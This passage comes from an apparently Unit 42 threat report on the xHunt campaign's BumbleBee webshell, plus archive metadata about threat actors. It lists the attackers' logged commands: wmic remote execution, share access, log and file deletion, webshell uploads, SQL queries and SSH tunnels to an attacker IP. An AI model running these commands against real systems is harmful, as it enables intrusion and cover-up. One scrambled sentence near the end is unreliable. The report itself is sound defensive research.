#1\u003e\\c$\\windows\\temp\\ww.txt\r\nT1039,\r\nT1021.002\r\n16:17:54\r\npowershell -c Test-NetConnection -ComputerName \u003credacted IP #1\u003e -\r\nPort 3389\r\nT1046,\r\nT1059.001\r\n16:19:28\r\npowershell -c Test-NetConnection -ComputerName \u003credacted IP #2\u003e -\r\nPort 3389\r\nT1046,\r\nT1059.001\r\n16:19:32\r\nwmic /node:\"\u003credacted IP #1\u003e\" /user:\u003credacted domain\u003e\\\u003credacted\r\nusername #2\u003e /PASSWORD:\u003credacted password #1\u003e process call create\r\n\"cmd /c powershell -c Test-NetConnection -ComputerName \u003credacted IP\r\n#2\u003e -Port 3389 \u003e c:\\windows\\temp\\r.txt\"\r\nT1046, T1047,\r\nT1059.001,\r\nT1021.001\r\n16:20:00 type \\\u003credacted IP #1\u003e\\C$\\windows\\temp\\r.txt\r\nT1039,\r\nT1021.002\r\n16:20:34 ping -n 1 -a \u003credacted IP #2\u003e T1018\r\n16:21:29\r\nwmic /node:\"\u003credacted IP #2\u003e\" /user:administrator /PASSWORD:\"\r\n\u003credacted password #2\u003e\" process call create \"cmd.exe /c whoami\"\r\nT1047, T1033\r\n16:22:06\r\nwmic /node:\"\u003credacted IP #2\u003e\" /user:administrator /PASSWORD:\"\r\n\u003credacted password #2\u003e\" process call create \"cmd.exe /c whoami\"\r\nT1047, T1033\r\n16:22:59 net use T1021.002\r\nhttps://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/\r\nPage 14 of 17\n\n16:23:07 dir \\\u003credacted IP #1\u003e\\C$\\windows\\temp\\*.txt\r\nT1083,\r\nT1021.002\r\n16:23:16 type \\\u003credacted IP #1\u003e\\C$\\windows\\temp\\teredo.txt\r\nT1039,\r\nT1021.002\r\n16:23:27 del \\\u003credacted IP #1\u003e\\C$\\windows\\temp\\ww.txt\r\nT1070.004,\r\nT1021.002\r\n16:23:29 del \\\u003credacted IP #1\u003e\\C$\\windows\\temp\\r.txt\r\nT1070.004,\r\nT1021.002\r\n16:23:43 net use * /DELETE /y\r\nT1070.004,\r\nT1021.002\r\n17:21:19 del owafont_ja.aspx /F\r\nT1505.003,\r\nT1070.004\r\nTable 2. Commands the actor ran using BumbleBee webshell on the compromised Exchange server.\r\nCommands Executed via BumbleBee on IIS Web Server\r\nTime\r\nWebshell\r\nFilename\r\nCommand ATT\u0026CK TIDs\r\n9/10/20\r\n20:47:36\r\nShowDoc.aspx\r\nhostname \u0026 whoami \u0026 ipconfig/all \u0026 route print \u0026 arp -\r\na\r\nT1082,\r\nT1033,\r\nT1016\r\n9/10/20\r\n20:48:03\r\nShowDoc.aspx ping -n 1 -a \u003credacted IP\u003e T1018\r\n9/10/20\r\n20:48:20\r\nShowDoc.aspx ping -n 1 -a \u003credacted domain\u003e T1018\r\n9/10/20\r\n20:48:29\r\nShowDoc.aspx net users /domain T1087.002\r\n9/10/20\r\n20:48:33\r\nShowDoc.aspx ipconfig/all T1016\r\n9/10/20\r\n20:49:19\r\nShowDoc.aspx echo %USERDOMAIN% T1016\r\nhttps://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/\r\nPage 15 of 17\n\n9/10/20\r\n20:49:27\r\nShowDoc.aspx net users /domain T1087.002\r\n9/10/20\r\n20:49:35\r\nShowDoc.aspx net users T1087.001\r\n9/10/20\r\n20:49:44\r\nShowDoc.aspx net localgroup administrators T1087.001\r\n9/10/20\r\n20:50:16\r\nShowDoc.aspx net view T1135\r\n9/10/20\r\n20:50:21\r\nShowDoc.aspx type ..\\..\\web.config T1005\r\n9/10/20\r\n20:50:40\r\nShowDoc.aspx ** Uploads cq.aspx webshell ** T1505.003\r\n9/10/20\r\n20:51:16\r\ncq.aspx\r\npowershell -C \"$conn=new-object\r\nSystem.Data.SqlClient.SQLConnection(\"\"\"\u003credacted\r\nSQL connection\u003e\"\"\");Try { $conn.Open(); }Catch {\r\ncontinue; }$cmd = new-object\r\nSystem.Data.SqlClient.SqlCommand(\"\"\"select\r\n@@version;\"\"\",$conn);$ds=New-Object\r\nsystem.Data.DataSet;$da=New-Object\r\nsystem.Data.SqlClient.SqlDataAdapter($cmd);\r\n[void]$da.fill($ds);$ds.Tables[0];$conn.Close();\"\r\nT1059.001,\r\nT1213\r\n9/10/20\r\n20:51:37\r\ncq.aspx\r\npowershell -C \"$conn=new-object\r\nSystem.Data.SqlClient.SQLConnection(\"\"\"\u003credacted\r\nSQL connection\u003e\"\"\");Try { $conn.Open(); }Catch {\r\ncontinue; }$cmd = new-object\r\nSystem.Data.SqlClient.SqlCommand(\"\"\"\u003credacted SQL\r\nquery\u003e\"\"\",$conn);$ds=New-Object\r\nsystem.Data.DataSet;$da=New-Object\r\nsystem.Data.SqlClient.SqlDataAdapter($cmd);\r\n[void]$da.fill($ds);$ds.Tables[0];$conn.Close();\"\r\nT1059.001,T1213\r\n9/10/20\r\n20:51:45\r\ncq.aspx powershell -C \"$conn=new-object\r\nSystem.Data.SqlClient.SQLConnection(\"\"\"\u003credacted\r\nSQL connection\u003e\"\"\");Try { $conn.Open(); }Catch {\r\ncontinue; }$cmd = new-object\r\nSystem.Data.SqlClient.SqlCommand(\"\"\"\u003credacted SQL\r\nquery\u003e\"\"\",$conn);$ds=New-Object\r\nsystem.Data.DataSet;$da=New-Object\r\nT1059.001,T1213\r\nhttps://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/\r\nPage 16 of 17\n\nsystem.Data.SqlClient.SqlDataAdapter($cmd);\r\n[void]$da.fill($ds);$ds.Tables[0];$conn.Close();\"\r\n9/10/20\r\n20:52:27\r\nShowDoc.aspx del cq.aspx T1070.004\r\nTable 3. Commands the actor ran using BumbleBee webshell hosted at second Kuwaiti organization.\r\nTable of Contents\r\nExecutive Summary\r\nBumbleBee Webshell\r\nInteractions With Compromised Microsoft Exchange Server\r\nCommands Executed via BumbleBee\r\nFile Uploader and SSH Tunnels\r\nRelated xHunt Infrastructure\r\nConclusion\r\nAdditional Resources\r\nAppendix\r\nRelated Articles\r\nThreat Assessment: Howling Scorpius (Akira Ransomware)\r\nLateral Movement on macOS: Unique and Popular Techniques and In-the-Wild Examples\r\nThreat Brief: ConnectWise ScreenConnect Vulnerabilities (CVE-2024-1708 and CVE-2024-1709)\r\nEnlarged Image\r\nSource: https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/\r\nhttps://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/\r\nPage 17 of 17\n\nthe actor executed a different external commands IP address that use the same controlled by the username and actor, as in the password as seen following: in the xHunt cheat sheet, but with\n1.exe 142.11.211[.]79 -C-R 0.0.0.0:8080:10.x.x.x:80 -l bor-pw 123321-P 443 \nSVROOT.exe 142.11.211[.]79 -C-R 0.0.0.0:8081:10.x.x.x:80 -l bor-pw 123321 -P 443 \nThese commands differ from those used to create the SSH tunnel on the compromised Exchange server that\nallowed the actor to connect to the server using RDP over TCP port 3389. The commands above attempt to create\na tunnel to allow the actor to access web servers hosted at other internal servers over TCP port 80. We believe the\n Page 6 of 17", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/" ], "report_names": [ "bumblebee-webshell-xhunt-campaign" ], "threat_actors": [ { "id": "8c8fea8c-c957-4618-99ee-1e188f073a0e", "created_at": "2024-02-02T02:00:04.086766Z", "updated_at": "2026-04-10T02:00:03.563647Z", "deleted_at": null, "main_name": "Storm-1567", "aliases": [ "Akira", "PUNK SPIDER", "GOLD SAHARA" ], "source_name": "MISPGALAXY:Storm-1567", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "910b38e9-07fe-4b47-9cf4-e190a07b1b84", "created_at": "2024-04-24T02:00:49.516358Z", "updated_at": "2026-04-10T02:00:05.309426Z", "deleted_at": null, "main_name": "Akira", "aliases": [ "Akira", "GOLD SAHARA", "PUNK SPIDER", "Howling Scorpius" ], "source_name": "MITRE:Akira", "tools": [ "Mimikatz", "PsExec", "AdFind", "Akira _v2", "Akira", "Megazord", "LaZagne", "Rclone" ], "source_id": "MITRE", "reports": null }, { "id": "20bc5b83-9ea0-4e60-a23e-19bf203dc9fb", "created_at": "2022-10-25T16:07:24.432777Z", "updated_at": "2026-04-10T02:00:04.986077Z", "deleted_at": null, "main_name": "xHunt", "aliases": [ "Cobalt Katana", "Hive0081", "Hunter Serpens", "SectorD01" ], "source_name": "ETDA:xHunt", "tools": [ "CASHY200", "COLDTRAIN", "Gon", "Hisoka", "Killua", "Netero", "SHELLSTING", "Sakabota", "Snugy", "TriFive" ], "source_id": "ETDA", "reports": null }, { "id": "c5a103eb-08af-410b-b11d-3635f4d4a3eb", "created_at": "2025-08-07T02:03:24.756187Z", "updated_at": "2026-04-10T02:00:03.667108Z", "deleted_at": null, "main_name": "COBALT KATANA", "aliases": [ "Hive0081 ", "SectorD01 ", "xHunt campaign " ], "source_name": "Secureworks:COBALT KATANA", "tools": [ "CASHY200", "Diezen", "Eye", "Gon", "Hisoka", "Hisoka Netero", "HyphenShell", "Killua", "Sakabota", "Sakabota Framework" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434178, "ts_updated_at": 1775791902, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/6ec2a1f5631f6c6dfc4e1ad3c7de7e90b998a7a5.pdf", "text": "https://archive.orkl.eu/6ec2a1f5631f6c6dfc4e1ad3c7de7e90b998a7a5.txt", "img": "https://archive.orkl.eu/6ec2a1f5631f6c6dfc4e1ad3c7de7e90b998a7a5.jpg" } }